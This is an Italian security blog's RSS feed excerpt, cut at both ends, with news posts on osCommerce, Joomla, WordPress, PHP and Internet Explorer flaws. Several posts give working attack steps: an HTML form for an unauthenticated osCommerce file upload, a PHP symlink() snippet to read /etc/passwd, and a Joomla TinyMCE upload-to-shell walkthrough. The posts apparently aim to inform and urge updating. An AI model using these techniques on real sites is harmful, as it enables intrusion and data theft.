<p>A distanza di 2 anni i programmatori, dopo una lunga latitanza, hanno rilasciato <strong>2 nuove versioni</strong>: la <strong>2.3.1</strong> e la nuova <strong>3.0.1</strong>. Il rilascio delle due nuove versioni non ha avuto molto risalto e tra gli utilizzatori di questo applicativo pochi hanno provveduto ad aggiornare.</p>
<p>Lo scorso 14 Maggio, però, è stata scoperta una <strong>nuova falla</strong> (purtoppo molto simile alla precedente) che permette l&#8217;upload di files nella cartella &#8220;/images&#8221; senza dover utilizzare tecniche particolari o rubare i dati di Amministratore.</p>
<p><span id="more-2630"></span>Come riportato <a href="http://www.bugsearch.net/it/11838/oscommerce-231-bannermanagerphp-remote-file-upload-vulnerability.html" target="_blank"><strong>qui</strong></a> il componente Banner (<strong>banner_manager.php</strong>) della nuova versione 2.3.1 di OsCommerce soffre di una vulnerabilità che <strong>consente di uploadare files</strong> sul sito &#8220;vittima&#8221; semplicemente creando sul proprio PC una pagina html con il seguente codice:</p>

<div class="wp_syntax"><div class="code"><pre class="html" style="font-family:monospace;">&lt;form name=”new_banner” action=”http://site/path/admin/banner_manager.php/login.php?action=insert” method=”post” enctype=”multipart/form-data”&gt;&lt;br&gt;
&lt;input type=”file” name=”banners_image”&gt;&lt;br&gt;
&lt;input name=”submit” value=” Save ” type=”submit”&gt;&lt;/form&gt;</pre></div></div>

<p>Basterà sostituire a &#8220;<strong>site/path</strong>&#8221; il dominio e l&#8217;eventuale sottocartella del sito basato su questo Cms e salvare il file in formato &#8220;.html&#8221;.</p>
<p>Apritelo con il vostro Browser e vi troverete davanti un form di upload file.</p>
<p>Scegliete il vostro file e fate l&#8217;upload; una volta terminata l&#8217;operazione potrete interrogare il file richiamando l&#8217;url nel seguente modo:</p>
<p>http://<strong>site/path</strong>/images/&lt;fileinviato.php&gt;</p>
<p>Analizzando alcuni casi di utilizzo di questa vulnerabilità ho riscontrato casi di <strong>iniezione di virus/malware</strong> come <a href="http://www.capn3m0.org/hack-cannot-redeclare-security_update.html">già riscontrato</a> sempre nel 2009.</p>
<p>Non appena avrò maggiori informazioni provvederò a tenervi aggiornati.</p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-oscommerce-2.3.1-remote-file-upload-vulnerability.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Upgrade Joomla 1.5.23/1.6.3 &#8211; WordPress 3.1.2</title>
		<link>http://www.capn3m0.org/upgrade-joomla-wordpress.html</link>
		<comments>http://www.capn3m0.org/upgrade-joomla-wordpress.html#comments</comments>
		<pubDate>Wed, 27 Apr 2011 17:37:52 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[Web&Cms]]></category>
		<category><![CDATA[joomla]]></category>
		<category><![CDATA[joomla 1.5]]></category>
		<category><![CDATA[joomla 1.6]]></category>
		<category><![CDATA[security release]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[wordpress 3.1]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=2272</guid>
		<description><![CDATA[Il mese di Aprile 2011 per i due più diffusi Cms Php/MySQL ossia Joomla e WordPress sono state rilasciate diverse versioni, alcune legate a falle di sicurezza, altre a normali bug fix. Per Joomla, che attualmente sta portando avanti le due famiglie 1.5.x e 1.6.x sono state rilasciate le versioni 1.5.23 e 1.6.3 (c&#8217;è stata [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2011/04/wordpress-vs-joomla.png" rel="lightbox[2272]" title="wordpress-joomla"><img class="alignleft size-thumbnail wp-image-2273" title="wordpress-joomla" src="http://www.capn3m0.org/wp-content/uploads/2011/04/wordpress-vs-joomla-150x150.png" alt="Upgrade Joomla 1.5.23/1.6.3   WordPress 3.1.2" width="150" height="150" /></a>Il mese di Aprile 2011 per i due più diffusi Cms Php/MySQL ossia <a href="http://www.joomla.org/" target="_blank"><strong>Joomla</strong></a> e <a href="http://wordpress.org/" target="_blank"><strong>WordPress</strong></a> sono state rilasciate diverse versioni, alcune legate a falle di sicurezza, altre a normali bug fix.</p>
<p>Per <strong>Joomla</strong>, che attualmente sta portando avanti le due famiglie 1.5.x e 1.6.x sono state rilasciate le versioni <strong>1.5.23</strong> e <strong>1.6.3</strong> (c&#8217;è stata anche una 1.6.2 che ha avuto una vita molto breve).</p>
<p>La 1.5.23 è una security release in quanto una vulnerabilità nelle precedenti versioni permetteva di generare un errore che <strong>printava a video la path assoluta del sito</strong> (<strong>Information Disclosure</strong>). Era una informazione in più in mano all&#8217;eventuale hacker ma nulla di realmente pericoloso.</p>
<p><strong><a href="http://www.joomla.org/announcements/release-news/5367-joomla-1523-released.html" target="_blank">Joomla 1.5.23</a></strong></p>
<p>Le versione 1.6.3, invece, è una bug fix che risolve alcuni problemi emersi con questa nuova versione.</p>
<p>Al link sottostante potrete trovare maggiori informazioni e  consultando il Changelog potrete leggere tutte le modifiche/correzioni  che sono state apportate.</p>
<p><a href="http://www.joomla.org/announcements/release-news/5370-joomla-163-released.html" target="_blank"><strong>Joomla 1.6.3</strong></a></p>
<p>Per quanto riguarda <strong>WordPress</strong>, invece, sono state rilasciate a distanza di pochi giorni le versioni 3.1.1 e, l&#8217;ultima, la <strong>3.1.2</strong> che corregge una vulnerabilità (security release) che <strong>permetteva agli utenti &#8220;Contributor&#8221; di postare bypassando la</strong> fase di <strong>revisione</strong> obbligatoria da parte <strong>dell&#8217;Admin</strong>.</p>
<p><a href="http://wordpress.org/download/" target="_blank"><strong>WordPress 3.1.2</strong></a></p>
<p>Si consiglia a tutti di effettuare gli upgrade dei propri Cms e, soprattutto, di monitorare costantemente la pubblicazione di nuove release, soprattutto quando si tratta di security release <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_wink.gif' alt="Upgrade Joomla 1.5.23/1.6.3   WordPress 3.1.2" class='wp-smiley' title="Upgrade Joomla 1.5.23/1.6.3   WordPress 3.1.2 pics" /> </p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/upgrade-joomla-wordpress.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Microsoft, patch day da record</title>
		<link>http://www.capn3m0.org/microsoft-patch-day-da-record.html</link>
		<comments>http://www.capn3m0.org/microsoft-patch-day-da-record.html#comments</comments>
		<pubDate>Wed, 13 Apr 2011 05:00:23 +0000</pubDate>
		<dc:creator>Tacu</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Varie]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[patch]]></category>
		<category><![CDATA[patch-day]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/microsoft-patch-day-da-record.html</guid>
		<description><![CDATA[Il patch day di aprile porta all'utenza Microsoft un aggiornamento da record: 17 patch per 64 vulnerabilità. ]]></description>
			<content:encoded><![CDATA[<p>Il patch day di aprile porta all&#8217;utenza Microsoft un aggiornamento da record: 17 patch per 64 vulnerabilità.</p>
<p>Read the original:<br />
<a title="Microsoft, patch day da record" href="http://feedproxy.google.com/~r/webnewsit/~3/rSr9GqNlRUk/" target="_blank">Microsoft, patch day da record</a></p>
<p>Source: <a title="Informazione dal mondo digitale" href="http://www.webnews.it" target="_blank">Webnews</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/microsoft-patch-day-da-record.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Servizio delle Iene sulla Sicurezza Informatica di un Provider Italiano</title>
		<link>http://www.capn3m0.org/servizio-iene-sicurezza-informatica.html</link>
		<comments>http://www.capn3m0.org/servizio-iene-sicurezza-informatica.html#comments</comments>
		<pubDate>Mon, 01 Nov 2010 20:36:05 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack mail]]></category>
		<category><![CDATA[provider]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[sicurezza informatica]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=808</guid>
		<description><![CDATA[ Ieri (28/10/2010) il programma televisivo Le Iene ha pubblicato un servizio dimostrativo sulla vulnerabilità dei sistemi informatici Italiani prendendo di mira un provider di caselle eMail gratuite. Il servizio dimostra come sia possibile accedere (con una piccola sostituzione di parametri) alla casella eMail di un estraneo e prenderne il completo controllo. ]]></description>
			<content:encoded><![CDATA[<p>Il 28/10/2010 il programma televisivo <strong>Le Iene</strong> ha pubblicato un servizio dimostrativo sulla vulnerabilità dei sistemi informatici Italiani prendendo di mira un provider di caselle eMail gratuite. Il servizio dimostra come sia possibile accedere (con una piccola sostituzione di parametri) alla casella eMail di un estraneo e prenderne il completo controllo.</p>
<p>
<object id="veohFlashPlayer" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="450" height="341" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="name" value="veohFlashPlayer" /><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.3.1024&amp;permalinkId=v205465564BHCqS5a&amp;player=videodetailsembedded&amp;videoAutoPlay=0&amp;id=anonymous" /><param name="allowfullscreen" value="true" /><embed id="veohFlashPlayer" type="application/x-shockwave-flash" width="450" height="341" src="http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.3.1024&amp;permalinkId=v205465564BHCqS5a&amp;player=videodetailsembedded&amp;videoAutoPlay=0&amp;id=anonymous" allowscriptaccess="always" allowfullscreen="true" name="veohFlashPlayer"></embed></object>
</p>
<p>Read the original here:<br />
 <a title="Servizio delle Iene sulla Sicurezza Informatica di un Provider Italiano" href="http://feedproxy.google.com/~r/OverSecurity/~3/9x5bVt5F7CY/" target="_blank">Servizio delle Iene sulla Sicurezza Informatica di un Provider Italiano</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/servizio-iene-sicurezza-informatica.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[NEWS] Google vs. Cina grazie a Internet Explorer</title>
		<link>http://www.capn3m0.org/news-google-vs.-cina-grazie-a-internet-explorer.html</link>
		<comments>http://www.capn3m0.org/news-google-vs.-cina-grazie-a-internet-explorer.html#comments</comments>
		<pubDate>Mon, 25 Jan 2010 00:19:32 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Varie]]></category>
		<category><![CDATA[cina]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[internet explorer]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=376</guid>
		<description><![CDATA[In questi ultimi giorni persino sulla carta stampata si intravedono articoli riguardanti “fatti informatici” come lo scontro tra Google e il Governo Cinese oppure l’invito di alcuni Governi (Francia e Germania) a non utilizzare il noto Browser di Microsoft Internet Explorer. Immagino che la domanda di molti sia, cosa sta succedendo? Andiamo per ordine, circa [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2010/01/googlecina.jpg" rel="lightbox[376]" title="Google Cina"><img class="alignleft size-thumbnail wp-image-377" title="Google Cina" src="http://www.capn3m0.org/wp-content/uploads/2010/01/googlecina-150x150.jpg" alt="[NEWS] Google vs. Cina grazie a Internet Explorer" width="150" height="150" /></a>In questi ultimi giorni persino sulla carta stampata si intravedono articoli riguardanti “fatti informatici” come lo scontro tra <a href="http://www.google.com" target="_self"><strong>Google</strong></a> e il <strong>Governo Cinese</strong> oppure l’invito di alcuni Governi (Francia e Germania) a non utilizzare il noto Browser di <strong>Microsoft Internet Explorer</strong>. Immagino che la domanda di molti sia, cosa sta succedendo?</p>
<p>Andiamo per ordine, circa una settimana fa il colosso di MountView comunica l’individuazione di <strong>violazioni nella loro infrastruttura informatica mirati verso alcuni indirizzi email</strong>. In un primo momento hanno pensato che si trattasse di “normale amministrazione”, in fin dei conti una grande azienda come Google di violazioni o tentativi ne riceve quotidianamente. Indagando accuratamente, però, è emerso che il mittente di questi attacchi fosse il Governo Cinese e le vittime, invece, fossero alcuni esponenti per i diritti umani oltre ad una ventina di grandi aziende di vari settori: finanziario, chimico, comunicazione, etc.porpo</p>
<p><span id="more-376"></span>Constatando la gravità dell’accaduto hanno chiesto spiegazioni alla <a href="http://www.ansa.it/web/notizie/rubriche/tecnologia/2010/01/24/visualizza_new.html_1676779957.html" target="_blank"><strong>Cina che però fa orecchie da mercante</strong></a> e proprio negli ultimi giorni ha risposto sostenendo di non avere nulla a che fare con questi cyberattacchi. Google, calcolando che nel 2006 quando aprì in Cina dovette compiacere il Governo Cinese applicando la censura al suo Motore di Ricerca, non ha gradito questa risposta e in nome dei diritti umanitari e della democrazia ha ribattuto minacciando di chiudere i battenti in quella nazione. Nell’annuncio ufficiale dal loro Blog chiariscono che la decisione (che sembrebbe essere già stata presa) non è stata decisa né ancora comunicata ai dipendenti di Google.cn. Questo uno stralcio della <a href="http://googleblog.blogspot.com/2010/01/new-approach-to-china.html">comunicazione</a>:</p>
<blockquote><p><em>La decisione di riconsiderare la nostra attività in Cina è stata incredibilmente difficile e sappiamo che potrebbe avere conseguenze molto serie. Teniamo a specificare che la decisione è stata presa dalla dirigenza di Google negli Stati Uniti, senza che i nostri dipendenti in Cina ne fossero a conoscenza o fossero coinvolti nella decisione. A loro va il nostro riconoscimento per aver lavorato con grande dedizione al successo di Google.cn</em></p>
</blockquote>
<p>In alternativa alla chiusura proporranno/chiederanno alla Cina di poter impostare il loro Motore di Ricerca come nel resto del mondo quindi libero da censure di ogn<a href="http://www.capn3m0.org/wp-content/uploads/2010/01/obama.jpg" rel="lightbox[376]" title="Obama"><img class="alignright size-thumbnail wp-image-378" title="Obama" src="http://www.capn3m0.org/wp-content/uploads/2010/01/obama-150x150.jpg" alt="[NEWS] Google vs. Cina grazie a Internet Explorer" width="150" height="150" /></a>i sorta. Nel frattempo si sono movimentati gruppi e tra i nomi attivi in questa campagna a favore della libertà di Internet per la Cina abbiamo <strong>Hilary Clinton</strong> che dal Museo dell’Informazione di Washington ha lanciato la nuova politica estera basata sulla libertà di internet. Anche Obama ha espresso la sua preoccupazione circa questa situazione e, come riportato dal suo portavoce:</p>
<blockquote><p><em>Il presidente «continua ad essere turbato dalla falla nella cyber sicurezza che Google attribuisce alla Cina&#8230; Stiamo aspettando delle risposte dalla Cina». Burton ha aggiunto che Obama ritiene che i responsabili dovrebbero «affrontare le conseguenze» dei loro atti.</em></p>
</blockquote>
<p>Nell’attesa di ulteriori sviluppi su questa vicenda negli stessi giorni se ne è sviluppata una seconda. Infatti alcuni esperti di sicurezza analizzando le violazioni subite da Google hanno comunicato che tali attacchi sono stati possibili a causa di una grave vulnerabilità presente in alcune versioni di <strong>Internet Explorer</strong>.</p>
<p>Secondo l’Ufficio Federale responsabile per la sicurezza informatica Tedesco (BSI) la vulnerabilità affligge tutte le versioni di Internet Explorer dalla 6 alla più recente 8 presente negli ultimi Windows Vista e Windows Seven. Microsoft Italia risponde sottolineando che la falla è grave solo nella versione Internet Explorer 6 con piattaforma Windows Xp mentre in tutti i nuovi sistemi operativi e browser, grazie alle funzionalità di sicurezza che sono state implementate, il problema risulta di gravità inferiore.</p>
<p>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="400" height="300" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://vimeo.com/moogaloop.swf?clip_id=8813503&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" /><embed type="application/x-shockwave-flash" width="400" height="300" src="http://vimeo.com/moogaloop.swf?clip_id=8813503&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" allowscriptaccess="always" allowfullscreen="true"></embed></object>
</p>
<p><a href="http://vimeo.com/8813503">Internet Explorer &#8211; Feliciano Intini e Luca Colombo</a> from <a href="http://vimeo.com/user943992">MClips</a> on <a href="http://vimeo.com">Vimeo</a>.</p>
<p>Tale problematica ha portato ad alcune eclatanti affermazioni come lo stesso BSI che ha invitato gli utenti tedeschi a non utilizzare Internet Explorer ed utilizzare browser alternativi a cui ha fatto eco la Francia con il CERTA che invitava gli utenti degli Enti pubblici e non utilizzare questo browser.</p>
<p>Nonostante quanto detto comprendendo l’agitazione tra i suoi utenti Microsoft ha fatto uscire una <a href="http://www.microsoft.com/technet/security/bulletin/ms10-jan.mspx" target="_blank"><strong>patch straordinaria</strong></a> dove risolve il problema indicato sottolineando ancora una volta che gli utenti delle più recenti versioni del Browser non devono (e non dovevano) preoccuparsi poiché le funzionalità di Data Execution Prevention e di Protected Mode rendevano il rischio inesistente.</p>
<p>Da notare come nell’ultime <a href="http://www.microsoft.com/technet/security/bulletin/ms10-jan.mspx" target="_blank">Microsoft Security Bulletin</a> di Gennaio ci sia citata Google tra i ringraziamenti ed in particolare Tavis Ormandy, scopritore della falla che recentemente ha segnalato una vulnerabilità di code injection in tutti i Sistemi Microsoft 32 bit dal 1993 ad oggi. In <a href="http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html" target="_blank"><strong>questo articolo</strong></a> potete leggere nel dettaglio la falla da lui individuata.</p>
<p>Speriamo che da queste vicende sempre più utenti si avvicinino e comprendano i pericoli della sicurezza informatica provvedendo a proteggere i propri Pc mantenendoli costantemente aggiornati e controllati.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/news-google-vs.-cina-grazie-a-internet-explorer.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PHP 5.2.12/5.3.1 symlink() open_basedir bypass</title>
		<link>http://www.capn3m0.org/php-5.2.125.3.1-symlink-open_basedir-bypass.html</link>
		<comments>http://www.capn3m0.org/php-5.2.125.3.1-symlink-open_basedir-bypass.html#comments</comments>
		<pubDate>Wed, 06 Jan 2010 22:10:50 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=367</guid>
		<description><![CDATA[Sebbene in ritardo rispetto alla data di pubblicazione di questo Exploit (13/11/2009) oggi vi parlerò di una grave falla individuata nelle versioni 5.2.12/5.3.1 del Php che sfruttando delle falle strutturali delle funzioni symlink() permette di bypassare il check dei permessi della funzione open_basedir. Di fatto questa vulnerabilità da la possibilità di leggere aree/file del WebServer [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2010/01/php.jpg" rel="lightbox[367]" title="Php"><img class="alignleft size-thumbnail wp-image-368" title="Php" src="http://www.capn3m0.org/wp-content/uploads/2010/01/php-150x150.jpg" alt="PHP 5.2.12/5.3.1 symlink() open basedir bypass " width="150" height="150" /></a>Sebbene in ritardo rispetto alla data di pubblicazione di questo Exploit (13/11/2009) oggi vi parlerò di una grave falla individuata nelle versioni <strong>5.2.12/5.3.1 del Php</strong> che sfruttando delle falle strutturali delle funzioni <strong>symlink()</strong> permette di bypassare il check dei permessi della funzione open_basedir.</p>
<p>Di fatto questa <strong>vulnerabilità</strong> da la possibilità di leggere aree/file del WebServer non autorizzate quali il file &#8220;<strong>/etc/passwd</strong>&#8221; e similari.</p>
<p>L&#8217;applicazione pratica e più semplice di tale vulnerabilità è il seguente codice:</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #339933;">&lt;</span> ?php
 <span style="color: #990000;">symlink</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;/etc/passwd&quot;</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">&quot;prova.txt&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
 <span style="color: #000000; font-weight: bold;">?&gt;</span></pre></div></div>

<p><span>Se il &#8220;safe_mode&#8221; del Php era disabilitato nel proprio spazio sarebbe stato creato un link simbolico dal nome &#8220;prova.txt&#8221; che puntava al contenuto di &#8220;/etc/passwd&#8221;. In questo modo richiamando dal browser il link simbolico nel seguente modo:</span></p>
<p><cite><span>http://&lt;dominio&gt;/prova.txt</span></cite></p>
<p><span>avremmo visualizzato a video il contenuto del file &#8220;/etc/passwd&#8221;. A seconda dell&#8217;Hosting questo file può contenere anche le password dell&#8217;account web del Cliente e pertanto la gravità della vulnerabilità è elevata.</span></p>
<p><span>Nel caso, invece, il safe_mode del Php fosse stato attivo sarebbe stato visualizzato un messaggio di errore che indicava l&#8217;impossibilità di eseguire l&#8217;operazione a causa della mancanza dei permessi di accesso al file &#8220;/etc/passwd&#8221;.</span></p>
<p>Ho provato ad applicare questa tecnica su diversi Hosting dove ho sitarelli o spazi per fare dei test e in base ad alcune configurazioni di sicurezza (privilegi, followsymlink,etc.) si poteva o meno accedere a dati sensibili come, per esempio, visualizzare i file di configurazione di altri domini presenti sullo stesso server dove siamo noi.</p>
<p>Questa <strong>vulnerabilità</strong> del Php ha fatto nascere alcune discussioni legate ai vari <strong>attacchi di massa</strong> che si sono verificati lo scorso anno su vari Hosting condivisi noti e meno noti. Dal mio punto di vista è plausibile pensare, quindi, che questa falla abbia dato la possibilità di accedere e violare centinaia di spazi Web rubando informazioni preziose per eventuali ulteriori attacchi.</p>
<p>Link correlati:</p>
<p><a href="http://www.exploit-db.com/exploits/10557" target="_blank"><strong>Exploit</strong></a></p>
<p><a href="http://securityreason.com/achievement_exploitalert/14" target="_blank"><strong>PHP 5.2.12/5.3.1 symlink() open_basedir bypass &#8211; SecurityReason.com</strong></a></p>
<p><a href="http://sicurezza.html.it/articoli/leggi/1007/tecniche-symlink-attack/" target="_blank"><strong>Symlink Attack &#8211; HTML.it</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/php-5.2.125.3.1-symlink-open_basedir-bypass.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] &#8211; Joomla 1.5.12 RCE via TinyMCE upload vulnerability</title>
		<link>http://www.capn3m0.org/exploit-joomla-1.5.12-rce-via-tinymce-upload-vulnerability.html</link>
		<comments>http://www.capn3m0.org/exploit-joomla-1.5.12-rce-via-tinymce-upload-vulnerability.html#comments</comments>
		<pubDate>Tue, 24 Nov 2009 23:35:03 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hash md5]]></category>
		<category><![CDATA[joomla]]></category>
		<category><![CDATA[joomla 1.5.12]]></category>
		<category><![CDATA[tinymce exploit]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=354</guid>
		<description><![CDATA[Per chi non avesse ancora aggiornato Joomla all&#8217;ultima versione 1.5.15 segnalo l&#8217;ennesima vulnerabilità trovata nelle versioni precedenti. Questa volta si tratta di una Remote Command Execution che sfruttando una vulnerabilità dell&#8217;utilizzatissimo TinyMCE permette di uploadare file che, teoricamente, dovrebbero essere proibiti. La vulnerabilità è stata scoperta dall&#8217;italiano Luca &#8220;daath&#8221; De Fulgentis che ha illustrato nel [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/joomla_tra.jpg" rel="lightbox[354]" title="Joomla"><img class="alignleft size-thumbnail wp-image-355" title="Joomla" src="http://www.capn3m0.org/wp-content/uploads/2009/11/joomla_tra-150x150.jpg" alt="[EXPLOIT]   Joomla 1.5.12 RCE via TinyMCE upload vulnerability" width="150" height="150" /></a>Per chi non avesse ancora aggiornato <a href="http://www.joomla.org" target="_blank"><strong>Joomla</strong></a> all&#8217;ultima versione 1.5.15 segnalo l&#8217;ennesima <strong>vulnerabilità</strong> trovata nelle versioni precedenti.</p>
<p>Questa volta si tratta di una Remote Command Execution che sfruttando una vulnerabilità dell&#8217;utilizzatissimo TinyMCE permette di uploadare file che, teoricamente, dovrebbero essere proibiti. La vulnerabilità è stata scoperta dall&#8217;italiano Luca &#8220;daath&#8221; De Fulgentis che ha illustrato nel dettaglio l<strong>&#8216;exploit</strong> nel suo <a href="http://blog.nibblesec.org/2009/09/just-press-exploit.html" target="_blank">blog</a>.</p>
<p>Dal sito di <a href="http://www.exploit-db.com/exploits/10183" target="_blank">Offensive-Security</a>, che andrà a sostituire il noto <a href="http://www.milw0rm.com/" target="_blank">Milw0rm</a>, ormai chiuso, è possibile <strong>scaricare l&#8217;exploit Php</strong> che consente di uploadare qualsiasi tipo di file semplicemente eseguend l&#8217;exploit php dalla propria shell.</p>
<p><span id="more-354"></span></p>
<p>Come detto in precedenza l&#8217;hack sfrutta una vulnerabilità del<strong> TinyMCE</strong>. Questo editor utilizza un array dove vengono dichiarate le estensioni dei file che non possono essere uploadate ma modificando opportunamente gli <strong>Header HTTP</strong> è possibile uploadare un file con un&#8217;estensione accettata e successivamente far effettuare il rename del file allo stesso TinyMCE.</p>
<p>Ovviamente vi è un sistema di &#8220;sicurezza&#8221; nello script dell&#8217;editor ma, purtroppo, si tratta di una semplice verifica di un <strong>hash MD5</strong> generato dalla concatenazione della path assoluta con una variabile chiamata &#8220;$tinybrowser['obfuscate']&#8221; che è settata di default a &#8220;s0merand0mjunk!!!111&#8243; nel file &#8220;config_tinybrowser.php&#8221; che trovate al seguente percorso:</p>
<p><cite>http://&lt;path_joomla&gt;/</cite>plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/config_tinybrowser.php</p>
<p><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/tinybrowser.PNG" rel="lightbox[354]" title="TinyBrowser"><img class="aligncenter size-thumbnail wp-image-356" title="TinyBrowser" src="http://www.capn3m0.org/wp-content/uploads/2009/11/tinybrowser-150x150.PNG" alt="[EXPLOIT]   Joomla 1.5.12 RCE via TinyMCE upload vulnerability" width="150" height="150" /></a></p>
<p>Questo invece il sistema di &#8220;sicurezza&#8221; (o meglio, la <strong>vulnerabilità</strong>) del file &#8220;upload_file.php&#8221; che verifica l&#8217;Hash MD5:</p>
<p><br class="spacer_" /></p>
<p><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/uploadtinybrowser.PNG" rel="lightbox[354]" title="Upload File TinyBrowser"><img class="aligncenter size-thumbnail wp-image-357" title="Upload File TinyBrowser" src="http://www.capn3m0.org/wp-content/uploads/2009/11/uploadtinybrowser-150x150.PNG" alt="[EXPLOIT]   Joomla 1.5.12 RCE via TinyMCE upload vulnerability" width="150" height="150" /></a></p>
<p>L&#8217;<strong>exploit</strong> creato da daath una volta indicato il &#8220;sito vittima&#8221; per prima cosa provvede a bypassare questo meccanismo effettuando un Path Disclosure. Con questa tecnica si interroga un file in modo non corretto così da far mostrare a video un tipico errore PHP che riporta la path assoluta del file in errore. Una volta ottenuta questa informazione si potrà ricreare l&#8217;Hash MD5 (path assoluta + &#8216;s0merand0mjunk!!!111&#8242;) tramite il quale poter lanciare una <strong>POST Http</strong> per l&#8217;upload del file. Il file, ovviamente, dovrà avere un&#8217;estensione valida come, ad esempio, &#8220;.jpg&#8221;.</p>
<p>Una volta effettuato l&#8217;upload si effettua una seconda interrogazione Http inviando i dati necessari a far eseguire il rename del file da &#8220;.jpg&#8221; (o qualunque estensione è stata scelta) a &#8220;.php&#8221;.</p>
<p>A questo punto si avrà una <strong>shell</strong> sul sito e si potra effettuare qualsiasi azione sia consentita all&#8217;utente web del sito vittima.</p>
<p>Come detto all&#8217;inzio dell&#8217;articolo provvedete sempre ad aggiornare alle ultime release le vostre applicazioni web! <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_wink.gif' alt="[EXPLOIT]   Joomla 1.5.12 RCE via TinyMCE upload vulnerability" class='wp-smiley' title="[EXPLOIT]   Joomla 1.5.12 RCE via TinyMCE upload vulnerability pics" /> </p>
<p><br class="spacer_" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-joomla-1.5.12-rce-via-tinymce-upload-vulnerability.html/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT - POC] &#8211; osCommerce 2.2 RC2 Authentication Bypass</title>
		<link>http://www.capn3m0.org/exploit-poc-oscommerce-2.2-rc2-authentication-bypass.html</link>
		<comments>http://www.capn3m0.org/exploit-poc-oscommerce-2.2-rc2-authentication-bypass.html#comments</comments>
		<pubDate>Wed, 18 Nov 2009 20:28:26 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
